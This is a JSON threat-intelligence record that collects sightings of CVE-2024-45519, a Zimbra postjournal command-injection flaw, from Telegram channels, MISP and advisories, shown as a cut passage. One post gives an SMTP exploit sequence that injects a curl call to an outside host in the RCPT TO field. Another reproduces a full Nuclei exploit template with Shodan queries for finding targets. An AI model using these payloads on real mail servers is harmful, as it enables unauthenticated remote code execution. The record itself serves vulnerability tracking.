{"vulnerability": "CVE-2024-45519", "sightings": [{"uuid": "78101531-46de-4397-a76a-551ef4b6164f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://bsky.app/profile/zttbytd.com/post/3leypimntq42j", "content": "", "creation_timestamp": "2025-01-05T13:19:39.524290Z"}, {"uuid": "2b623d22-0e2d-4995-b3ba-9a48ea57aabc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories", "content": "", "creation_timestamp": "2025-02-17T08:58:49.232676Z"}, {"uuid": "ec8db3a4-3686-4d73-9414-39b71fde0130", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:59.000000Z"}, {"uuid": "2ecfe12b-51e5-4abd-90f8-18fb130ff00a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/ca550ce6-190e-460d-a052-c77cd8457862", "content": "", "creation_timestamp": "2026-02-02T12:26:27.312262Z"}, {"uuid": "5a6b31e3-4d0a-49a4-bde6-3791394e8144", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/ca550ce6-190e-460d-a052-c77cd8457862", "content": "", "creation_timestamp": "2026-02-02T12:26:27.312262Z"}, {"uuid": "00639f28-f672-4275-aed7-0c3be9b64f3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8602", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-45519 unauthenticated OS commoand Injection in Zimbra prior to 8.8.15***.\nURL\uff1ahttps://github.com/TOB1a3/CVE-2024-45519-PoC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-09-26T01:37:36.000000Z"}, {"uuid": "f43466bd-5cce-43a1-a602-1be9cdc29943", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/ptswarm/220", "content": "\u26a0\ufe0f We've confirmed critical CVE-2024-45519 in Zimbra!\n\nSMTP-based vulnerability in postjournal service allows unauthenticated attackers to inject commands under zimbra user.\n\n\u2705 Update your software ASAP to avoid exploitation!", "creation_timestamp": "2024-09-24T15:21:20.000000Z"}, {"uuid": "84dc77dc-a0d6-4019-b2ff-30d75af95cf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/ptswarm/224", "content": "\ud83e\udd20 A notorious RCE in Zimbra, CVE-2024-45519 \u2013 here\u2019s our expert breakdown!\n\nHigh resolution", "creation_timestamp": "2024-09-30T14:31:29.000000Z"}, {"uuid": "d1cdb031-308e-4a5c-8212-1cabb0f8380d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/beaverdreamer/167", "content": "#zimbra #rce\n\n\u0412\u044b\u0448\u043b\u0430 \u043d\u043e\u0432\u0430\u044f CVE-2024-45519 \u043d\u0430 Zimbra Collaboration Suite < 9.0.0, \u0430 \u0438\u043c\u0435\u043d\u043d\u043e \u043d\u0430 \u0441\u0435\u0440\u0432\u0438\u0441 postjournal. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0439 \u043a\u043e\u0434 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438\n\u0412 \u0434\u043e\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a \u0434\u0440\u0443\u0433\u0438\u043c \u043f\u043e\u0441\u0442\u0430\u043c \u0445\u043e\u0447\u0443 \u043e\u0442\u043c\u0435\u0442\u0438\u0442\u044c, \u0447\u0442\u043e \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e Zimbra \u043d\u0435 \u0431\u0443\u0434\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u0430, \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u0439 \u043c\u043e\u0434\u0443\u043b\u044c postjournal.\n\n\u041f\u0440\u0438\u043c\u0435\u0440 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438:\nEHLO localhost\nMAIL FROM: \nRCPT TO: <\"aabbb$(curl${IFS}oast.me)\"@mail.domain.com>\nDATA\nTest message\n.\n\n\u0422\u0430\u043a \u0436\u0435 \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c \u043e\u0434\u0438\u043d \u0438\u0437 \u0434\u0432\u0443\u0445 \u043f\u0443\u043d\u043a\u0442\u043e\u0432:\n- \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u043b\u0438\u0431\u043e \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u043d\u043e\u0439 \u0441\u0435\u0442\u0438 (\u0441\u043f\u0438\u0441\u043e\u043a mynetworks), \u043b\u0438\u0431\u043e \u0440\u0430\u0441\u0441\u0447\u0438\u0442\u044b\u0432\u0430\u0442\u044c \u0447\u0442\u043e \u043e\u043d\u0430 \u0431\u0443\u0434\u0435\u0442 \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e \u0441\u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u0430\n- \u043f\u0440\u043e\u0439\u0442\u0438 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044e.\n\n\u041f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b (\u0448\u0430\u0431\u043b\u043e\u043d nuclei \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435) \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u044e\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0431\u0435\u0437 \u0430\u0443\u0442\u0445\u0430.\n\n\u0414\u0435\u0442\u0430\u043b\u0438 \u0432 \u043e\u0442\u043b\u0438\u0447\u043d\u043e\u043c \u0440\u0430\u0437\u0431\u043e\u0440\u0435 \u0432 \u0431\u043b\u043e\u0433\u0435 ProjectDiscovery.\n\n\u0421\u0441\u044b\u043b\u043a\u0438:\n- \u0420\u0430\u0437\u0431\u043e\u0440: https://blog.projectdiscovery.io/zimbra-remote-code-execution/\n- \u0428\u0430\u0431\u043b\u043e\u043d: https://github.com/projectdiscovery/nuclei-templates/pull/10860", "creation_timestamp": "2024-09-29T10:37:41.000000Z"}, {"uuid": "370bcf36-2012-4b54-8e4f-2fda7163512f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "Telegram/QxnLRuWdGgoTS9SuvQjCy4QGFdybsJKul7e0GN0IcFjceA", "content": "", "creation_timestamp": "2024-09-29T21:40:08.000000Z"}, {"uuid": "18b515af-affc-4c92-a6ae-8ea0a6837af6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/ton618cyber/1598", "content": "#exploit\n1. CVE-2024-45519: \nZimbra SMTP RCE\nhttps://blog.projectdiscovery.io/zimbra-remote-code-execution\n]-> https://github.com/p33d/CVE-2024-45519\n\n2. CVE-2024-41110:\nDocker AuthZ plugins Security Checker\nhttps://github.com/vvpoglazov/cve-2024-41110-checker", "creation_timestamp": "2024-10-02T16:38:49.000000Z"}, {"uuid": "dff0dc1f-b2e4-4a44-af11-f3234b22f447", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/4362", "content": "\ud83d\udea8PoC CVE-2024-45519 - Zimbra Postjournal Exploit\n\nhttps://darkwebinformer.com/poc-cve-2024-45519-zimbra-postjournal-exploit/", "creation_timestamp": "2024-10-05T18:46:25.000000Z"}, {"uuid": "05d3c9e9-1bd5-4e20-bd8d-c9baa75c394b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/cvedetector/6885", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45519 - Zimbra Collaboration Command Injection Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45519 \nPublished : Oct. 2, 2024, 10:15 p.m. | 24\u00a0minutes ago \nDescription : The postjournal service in Zimbra Collaboration (ZCS) before 8.8.15 Patch 46, 9 before 9.0.0 Patch 41, 10 before 10.0.9, and 10.1 before 10.1.1 sometimes allows unauthenticated users to execute commands. \nSeverity: 10.0 | CRITICAL \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"03 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-03T00:43:48.000000Z"}, {"uuid": "00677a7b-d12d-4b21-93d2-e6970249cda9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/455", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-45519 unauthenticated OS commoand Injection in Zimbra prior to 8.8.15***.\nURL\uff1ahttps://github.com/TOB1a3/CVE-2024-45519-PoC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-09-26T14:25:00.000000Z"}, {"uuid": "0f53449f-0fb2-49c5-9f41-7cfabd36f9a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/CyberBulletin/1096", "content": "\u26a1\ufe0fActive Exploits Target Zimbra Collaboration: Over 19K Systems Vulnerable to CVE-2024-45519.\n\n#CyberBulletin", "creation_timestamp": "2024-10-07T13:15:35.000000Z"}, {"uuid": "3e7fea30-d32a-46ac-8cf3-d64a4a755b64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/ZeroEthical_Course/1662", "content": "Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://github.com/Chocapikk/CVE-2024-45519\n\n#github #exploit #zimbra #rce", "creation_timestamp": "2024-10-06T05:30:19.000000Z"}, {"uuid": "e0154cfc-cd05-41fa-9949-18367bf4fe69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/HackingInsights/15377", "content": "\u200aActive Exploits Target Zimbra Collaboration: Over 19K Systems Vulnerable to CVE-2024-45519\n\nhttps://securityonline.info/active-exploits-target-zimbra-collaboration-over-19k-systems-vulnerable-to-cve-2024-45519/", "creation_timestamp": "2024-10-08T03:27:19.000000Z"}, {"uuid": "a2a5c24f-e245-423c-96b0-75286e7244b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/18985", "content": "https://github.com/p33d/CVE-2024-45519\n\nCVE-2024-45519\n#github #exploit", "creation_timestamp": "2024-09-29T17:32:28.000000Z"}, {"uuid": "dece0112-4011-4e40-9ef5-0b3c3738df43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/22507", "content": "The Hacker News\nResearchers Sound Alarm on Active Attacks Exploiting Critical Zimbra Postjournal Flaw\n\nCybersecurity researchers are warning about active exploitation attempts targeting a newly disclosed security flaw in Synacor's Zimbra Collaboration.\nEnterprise security firm Proofpoint said it began observing the activity starting September 28, 2024. The attacks seek to exploit CVE-2024-45519, a severe security flaw in its postjournal service that could enable unauthenticated attackers to", "creation_timestamp": "2024-10-02T09:40:31.000000Z"}, {"uuid": "f320026c-6323-4ba5-9792-27dc838eb3b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/pt_soft/376", "content": "\ud83c\udf83 CVE-2024-45519 : Zimbra - Remote Command Execution\n\nZimbra - \u0448\u0438\u0440\u043e\u043a\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0439 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440 \u0438 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0430 \u0434\u043b\u044f \u0441\u043e\u0432\u043c\u0435\u0441\u0442\u043d\u043e\u0439 \u0440\u0430\u0431\u043e\u0442\u044b\n\nNuclei \u0448\u0430\u0431\u043b\u043e\u043d:\n\nid: CVE-2024-45519\n\ninfo:\n  name: Zimbra Collaboration Suite < 9.0.0 - Remote Code Execution\n  author: pdresearch,iamnoooob,parthmalhotra,ice3man543\n  severity: critical\n  description: |\n    SMTP-based vulnerability in the PostJournal service of Zimbra Collaboration Suite that allows unauthenticated attackers to inject arbitrary commands. This vulnerability arises due to improper sanitization of SMTP input, enabling attackers to craft malicious SMTP messages that execute commands under the Zimbra user context. Successful exploitation can lead to unauthorized access, privilege escalation, and potential compromise of the affected system\u2019s integrity and confidentiality.\n  reference:\n    - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories\n  classification:\n    cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*\n  metadata:\n    vendor: synacor\n    product: zimbra_collaboration_suite\n    shodan-query:\n      - http.title:\"zimbra collaboration suite\"\n      - http.title:\"zimbra web client sign in\"\n      - http.favicon.hash:1624375939\n    fofa-query:\n      - title=\"zimbra web client sign in\"\n      - title=\"zimbra collaboration suite\"\n  tags: cve,cve2024,rce,zimbra\n\njavascript:\n  - pre-condition: |\n      isPortOpen(Host,Port);\n    code: |\n      let m = require('nuclei/net');\n      let address = Host+\":\"+Port;\n      let conn;\n      conn=  m.Open('tcp', address)\n      conn.Send('EHLO localhost\\r\\n');\n      conn.RecvString()\n      conn.Send('MAIL FROM: \\r\\n');\n      conn.RecvString()\n      conn.Send('RCPT TO: <\"aabbb$(curl${IFS}'+oast+')\"@mail.domain.com>\\r\\n');\n      conn.RecvString()\n      conn.Send('DATA\\r\\n');\n      conn.RecvString()\n      conn.Send('aaa\\r\\n');\n      conn.RecvString()\n      conn.Send('.\\r\\n');\n      resp = conn.RecvString()\n      conn.Send('QUIT\\r\\n');\n      conn.Close()\n      resp\n    args:\n      Host: \"{{Host}}\"\n      Port: 25\n      oast: \"{{interactsh-url}}\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n\n      - type: word\n        words:\n          - \"message delivered\"\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0432 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 9.0.0 Patch 41 \u0438 \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0437\u0434\u043d\u0438\u0445, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0432 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 10.0.9 \u0438 10.1.1 \u0438 Zimbra 8.8.15 Patch 46 \u0438 \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0437\u0434\u043d\u0438\u0445\n\n\ud83d\udcbb PoC\n\n#rce #cve #zimbra #poc\n\n\u2708\ufe0f // Pentest HaT \ud83c\udfa9", "creation_timestamp": "2024-10-06T09:04:26.000000Z"}, {"uuid": "be9c394b-9c15-4530-8b86-04a69d9f2a10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/softrinx/151795", "content": "CVE-2024-45519 \n*\nSMTP exploit", "creation_timestamp": "2024-09-30T00:37:28.000000Z"}, {"uuid": "49783f6d-594f-4fe9-b90c-afa811a72bf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "Telegram/LZ7XOPRoqwALVNc8I3LUwpNf-8CJ2PR-4TjRcjv0Z8qsO3g", "content": "", "creation_timestamp": "2025-03-09T04:00:07.000000Z"}, {"uuid": "bc17480e-be20-4e66-b5ee-14af44a02b5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8888", "content": "Tools - Hackers Factory \n\nIndetectables-net/toolkit: The essential toolkit for reversing, malware analysis, and cracking.\n\nhttps://github.com/indetectables-net/toolkit\n\nGitHub - Chocapikk/CVE-2024-45519: Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://github.com/Chocapikk/CVE-2024-45519\n\nOWASP Amass Project\n\nhttps://github.com/owasp-amass\n\nPoC for the Untrusted Pointer Dereference in the ks.sys driver\n\nhttps://github.com/varwara/CVE-2024-35250\n\nPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692\n\nhttps://github.com/verylazytech/CVE-2024-23692\n\nPowerShell Obfuscator\n\nhttps://github.com/TaurusOmar/psobf\n\nModTracer Finds Hidden Linux Kernel Rootkits and then make visible again.\n\nhttps://github.com/MatheuZSecurity/ModTracer\n\n1C RAS Offensive Security Tool\n\nhttps://github.com/sdnv0x4d/rasoff\n\nRust Weaponization for Red Team Engagements.\n\nhttps://github.com/trickster0/OffensiveRust\n\n#CyberDilara\nhttps://t.me/dilagrafie", "creation_timestamp": "2024-10-21T13:23:53.000000Z"}, {"uuid": "1f93d50d-2e61-4b2e-b4bd-93b98c8d58b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8864", "content": "Hackers Factory \n\nShodan Mindmap - For Hacking! \n\nSource: https://github.com/Ignitetechnologies/Mindmap/blob/main/Shodan/Shodan%20HD.png\n\nGuide: Build Your Own Penetration Testing Dropbox Using a Raspberry Pi 4\n\nBlog: https://artificesecurity.com/how-to-build-your-own-penetration-testing-dropbox-using-a-raspberry-pi-4/\n\n#infosec #bugbountytips\n\nDetailed Checklist: Android APK Pentesting Checklist \n\nChecklist: https://book.hacktricks.xyz/mobile-pentesting/android-checklist\n\n#infosec\n\nCVE-2024-45519:  Checks vulnerabilities in an SMTP server, Zimbra Remote Command Execution.\n\nhttps://github.com/p33d/CVE-2024-45519\n\nFor basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon.\n \nhttps://github.com/lutfumertceylan/top25-parameter\n\nXXE payloads for specific DTDs\n\nhttps://github.com/GoSecure/dtd-finder/blob/698fd678f26395e1c7c097525f7182aecad0cd5f/list/xxe_payloads.md\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-08T09:21:21.000000Z"}, {"uuid": "3050adeb-12ff-4c6e-9e83-3fe54857daeb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/softrinx/528", "content": "CVE-2024-45519 \n*\nSMTP exploit", "creation_timestamp": "2024-09-30T00:37:28.000000Z"}, {"uuid": "5468fe6a-2af3-41d6-b303-401f4140e8f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/proxy_bar/2279", "content": "CVE-2024-45519 \n*\nSMTP exploit", "creation_timestamp": "2024-09-29T11:36:37.000000Z"}, {"uuid": "08144ebe-ee15-4884-a9e4-3c7159ac66e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2294", "content": "\u041c\u044b \u0443\u0436\u0435 \u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u043f\u043e \u043f\u043e\u0432\u043e\u0434\u0443 CVE-2024-45519 - Zimbra\n*\n\u041d\u043e, \u0432\u043e\u0442 \u043e\u0442\u043b\u0438\u0447\u043d\u044b\u0439 Postjournal Exploit + \u0440\u0443\u043a\u043e\u0432\u043e\u0434\u0441\u0442\u0432\u043e \u043a\u0430\u043a \u043d\u0430\u0441\u0442\u0440\u043e\u0438\u0442\u044c \u0441\u0442\u0435\u043d\u0434 \u0447\u0442\u043e \u0431\u044b \u043f\u043e\u0438\u0433\u0440\u0430\u0442\u044c\u0441\u044f \u0441\u043e \u0441\u043f\u043b\u043e\u0438\u0442\u043e\u043c \u0438 \u0434\u0430\u043b\u0435\u0435 \u043f\u043e\u0432\u044b\u0448\u0430\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 (\u043b\u0438\u0431\u043e \u0432 \u0431\u043e\u043a \u0443\u0445\u043e\u0434\u0438\u0442\u044c)\n*\nzimbra.labo", "creation_timestamp": "2024-10-05T08:14:30.000000Z"}, {"uuid": "2d09665d-90a0-44b7-83be-8d8fd2f10c5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/thehackernews/5670", "content": "\u26a0\ufe0f Zimbra Collaboration is under attack via a critical vulnerability (CVE-2024-45519) enabling remote command execution. \n \nEven without Zimbra\u2019s postjournal enabled, attackers can exploit this flaw with crafted SMTP messages. \n \nLearn more: https://thehackernews.com/2024/10/researchers-sound-alarm-on-active.html", "creation_timestamp": "2024-10-02T07:58:40.000000Z"}, {"uuid": "f6a17e53-7633-4027-acca-fc3928f1d9d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/CyberBulletin/25904", "content": "\u26a1\ufe0fPoC Exploit Releases for Zimbra RCE Flaw CVE-2024-45519: Mass Exploitation Detected.\n\n#CyberBulletin", "creation_timestamp": "2024-10-04T14:13:35.000000Z"}, {"uuid": "f7921ad2-30c3-4ed6-8666-490a7e0c84a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/CyberBulletin/25905", "content": "\u26a1\ufe0fZimbra - Remote Command Execution (CVE-2024-45519).\n\n#CyberBulletin", "creation_timestamp": "2024-10-04T14:13:33.000000Z"}, {"uuid": "dabed7c4-7e36-4090-9b40-502aafdbf30d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3252", "content": "https://github.com/p33d/CVE-2024-45519\n\nCVE-2024-45519\n#github #exploit", "creation_timestamp": "2024-09-29T20:31:34.000000Z"}, {"uuid": "72ef0e9e-00bf-41a1-9ce2-4dffba3e3103", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3793", "content": "Tools - Hackers Factory \n\nMemProcFS-Analyzer - Automated Forensic Analysis of Windows Memory Dumps for DFIR \n\nhttps://github.com/evild3ad/MemProcFS-Analyzer\n\nTeamViewer User to Kernel Elevation of Privilege PoC. CVE-2024-7479 and CVE-2024-7481. ZDI-24-1289 and ZDI-24-1290. TV-2024-1006.\n\nhttps://github.com/PeterGabaldon/CVE-2024-7479_CVE-2024-7481\n\nGet PROXY List that gets updated everyday \n\nhttps://github.com/TheSpeedX/PROXY-List\n\nPrying Deep - An OSINT tool to collect intelligence on the dark web\n\nhttps://github.com/iudicium/pryingdeep\n\nA tool for scanning public or private AMIs for sensitive files and secrets. The tool follows the research made on AWS CloudQuarry where we scanned 20k+ public AMIs. \n\nhttps://github.com/saw-your-packet/CloudShovel\n\nCVE-2024-45519\n\nhttps://github.com/p33d/CVE-2024-45519\n\nCVE-2024-0044: a \"run-as any app\" high-severity vulnerability affecting Android versions 12 and 13 \n\nhttps://github.com/pl4int3xt/cve_2024_0044\n\nGoogle & Shodan Dorks for WebCam\n\nhttps://github.com/ExploitXpErtz/WebCam-Google-Shodan-Dorks\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-14T06:01:06.000000Z"}, {"uuid": "5d32a4dd-8b14-4fde-b22c-d90d576dc101", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "MISP/f7787455-9994-4047-b6f7-77347597c104", "content": "", "creation_timestamp": "2025-08-26T18:36:20.000000Z"}, {"uuid": "58811040-4cf4-441c-91f0-c87fe0a3217b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8680", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aZimbra - Remote Command Execution (CVE-2024-45519)\nURL\uff1ahttps://github.com/Chocapikk/CVE-2024-45519\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-10-05T00:20:30.000000Z"}, {"uuid": "2c366797-e715-49f7-a2a2-a0470643cf11", "vulnerability_lookup_origin": 